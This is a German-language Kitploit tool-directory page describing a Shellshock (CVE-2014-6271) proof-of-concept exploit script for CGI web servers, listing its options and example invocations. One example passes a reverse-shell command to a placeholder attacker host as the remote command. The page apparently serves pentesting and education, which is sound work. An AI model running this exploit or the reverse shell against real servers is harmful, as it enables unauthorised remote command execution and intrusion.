Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2014-6271-Shellshock — CVE-2014-6271 Exploit | by infrar3d | Kitploit
Tools/GitHubGitHub/industri4l-h3ll-xpl0it3rs/cve-2014-6271-shellshock
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubindustri4l-h3ll-xpl0it3rs/cve-2014-6271-shellshock

CVE-2014-6271-Shellshock

CVE-2014-6271 Exploit | by infrar3d

Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
vor 5 MonatenNoch nicht geprüft

CVE-2014-6271 Shellshock

xpl0ited von infrar3d

Dieses Repository enthält einen Proof-of-Concept-Exploit für CVE-2014-6271 (Shellshock).

Shellshock ist eine kritische Schwachstelle in GNU Bash, bei der speziell präparierte Umgebungsvariablen die Ausführung beliebiger Befehle ermöglichen.
Wenn ein Webserver HTTP-Header an CGI-Skripte übergibt, die Bash aufrufen, kann ein Angreifer über diese Header Befehle einschleusen.

Verwendung:

root@kitploit:~
./shellshock_exp.sh -h                                        
shellshock_exp.sh [options]

Options:
	-h | --help	diese Meldung anzeigen und beenden
	-a | --address	Zieladresse (Standard ist "localhost")
	-p | --port	Zielport (Standard ist 80)
	-f | --file	Zieldatei (Standard ist "/cgi-bin/shell.sh")
	-c | --command	auf dem Zielrechner auszuführender Befehl (Standard ist "id")

Beispiele:

root@kitploit:~
./shellshock_exp.sh -a 192.168.1.10

./shellshock_exp.sh -a 192.168.1.10 -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

(getestet auf der VulnHub-Maschine "Hacksudo - Thor")

⚠️ Haftungsausschluss ⚠️

Diese Software und der Proof-of-Concept-Code werden ausschließlich zu Bildungs- und Forschungszwecken bereitgestellt.

  • Die Autoren sind nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Programm verursacht werden.
  • Nicht gegen Systeme ohne ausdrückliche vorherige Genehmigung verwenden.
  • Die Verwendung dieser Tools zum Angriff auf Ziele ohne Zustimmung ist illegal.

Sie sind dafür verantwortlich, alle geltenden Gesetze einzuhalten. Ethisch und verantwortungsbewusst nutzen.

Tool herunterladen